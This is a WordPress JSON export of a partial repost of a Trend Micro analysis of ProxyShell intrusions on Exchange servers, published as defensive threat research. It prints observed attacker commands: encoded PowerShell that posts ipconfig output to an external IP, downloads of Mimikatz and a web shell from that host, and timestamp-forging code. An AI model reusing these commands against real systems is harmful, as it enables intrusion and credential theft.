{"id":43971,"date":"2021-11-17T00:00:00","date_gmt":"2021-11-17T00:00:00","guid":{"rendered":"urn:uuid:234a19b6-a76b-eec1-12d0-1c06d6df6cca"},"modified":"2021-11-17T00:00:00","modified_gmt":"2021-11-17T00:00:00","slug":"analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/","title":{"rendered":"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/proxyshell-xdr-641.jpg\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/proxyshell-xdr-641.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p>Both servers are using Liferay CE version 6.2, which is vulnerable to <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2020-7961\">CVE-2020-7961<\/a> (possibly leading to remote code execution).<\/p>\n<h2><span class=\"body-subhead-title\">Incident # 2<\/span><\/h2>\n<p>Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.<\/p>\n<p>Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don\u2019t have information as to what was downloaded since the URL was already dead by the time of analysis.<\/p>\n<p><span class=\"blockquote\">&#8220;C:\\Windows\\System32\\cmd.exe&#8221; \/c powershell wget http:\/\/209.14.0[.]234:56138\/iMCRufG79yXvYjH0W1SK<\/span><\/p>\n<p>The following commands were executed in order to gather basic system information:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">cmd.exe \/c ipconfig<\/span><\/li>\n<li><span class=\"rte-red-bullet\">cmd.exe \/c dir<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c ping -n 1 google.com<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c whoami<\/span><\/li>\n<\/ul>\n<p>The web shell was then copied and the original entry deleted using the following commands:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">cmd.exe \/c ren C:\\inetpub\\wwwroot\\aspnet_client\\errorFF.aspx.req errorFF.aspx<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c del &#8220;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorFF.aspx.req&#8221;<\/span><\/li>\n<\/ul>\n<p>The ipconfig command was executed as an argument for a wget request.<\/p>\n<p>The following code shows the Powershell-encoded (top) and decoded (bottom) commands:<\/p>\n<p><span class=\"blockquote\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA\/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA<\/span><\/p>\n<p><span class=\"blockquote\">$r=ipconfig \/all | out-string;wget -Uri http:\/\/91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType &#8220;application\/octet-stream&#8221;<\/span><\/p>\n<p>Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:<\/p>\n<p><span class=\"blockquote\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=<\/span><\/p>\n<p><span class=\"blockquote\">Invoke-WebRequest -Uri &#8220;http:\/\/91.92.136.250:443\/mimi.exe&#8221; -OutFile &#8220;c:\\windows\\temp\\mimi.exe&#8221;<\/span><\/p>\n<p>The web shell then downloaded an additional .aspx web shell and timestamped it to further disguised itself in the system, seen in the following code:<\/p>\n<p><span class=\"blockquote\">Invoke-WebRequest -Uri &#8220;http:\/\/91.92.136.250:443\/out.aspx&#8221; -OutFile &#8220;c:\\windows\\temp\\OutlookCM.aspx&#8221;<\/span><\/p>\n<p>The web shell was then moved to the OWA directory with the following time stamp:<\/p>\n<p><span class=\"blockquote\">$f1=(Get-Item &#8216;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCM.aspx&#8217;); $f2=(Get-Item &#8216;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCN.aspx&#8217;); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;<\/span><\/p>\n<p>After a few minutes, additional DLLs were created, which was later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net files\\owa\\8e05b027\\e164d61b\\app_web_ffhsdhdi.dll<\/span><\/li>\n<li><span class=\"rte-red-bullet\">c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net files\\owa\\8e05b027\\e164d61b\\app_web_m123qbjp.dll<\/span><\/li>\n<\/ul>\n<p>In relation to this incident, we found the following malicious components and malware were used:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)<br \/><\/span><\/li>\n<li><span class=\"rte-red-bullet\">App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)<\/span><\/li>\n<\/ul>\n<h2><span class=\"body-subhead-title\">Other web shells<\/span><\/h2>\n<p>During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead.&nbsp; This is similar to the <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/02\/04\/ghost-in-the-shell-investigating-web-shell-attacks\/\">bespoke web shell<\/a> the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":43972,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9511,9555,9509],"class_list":["post-43971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-11-17T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/proxyshell-xdr-641.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR\",\"datePublished\":\"2021-11-17T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\"},\"wordCount\":615,\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"keywords\":[\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\",\"name\":\"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"datePublished\":\"2021-11-17T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.threatshub.org\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Cyber Threats\",\"item\":\"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-cyber-threats\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/","og_locale":"en_US","og_type":"article","og_title":"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-11-17T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/proxyshell-xdr-641.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR","datePublished":"2021-11-17T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/"},"wordCount":615,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg","keywords":["Trend Micro Research : Cyber Threats","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/","url":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/","name":"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg","datePublished":"2021-11-17T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Cyber Threats","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-cyber-threats\/"},{"@type":"ListItem","position":3,"name":"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=43971"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43971\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/43972"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=43971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=43971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=43971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}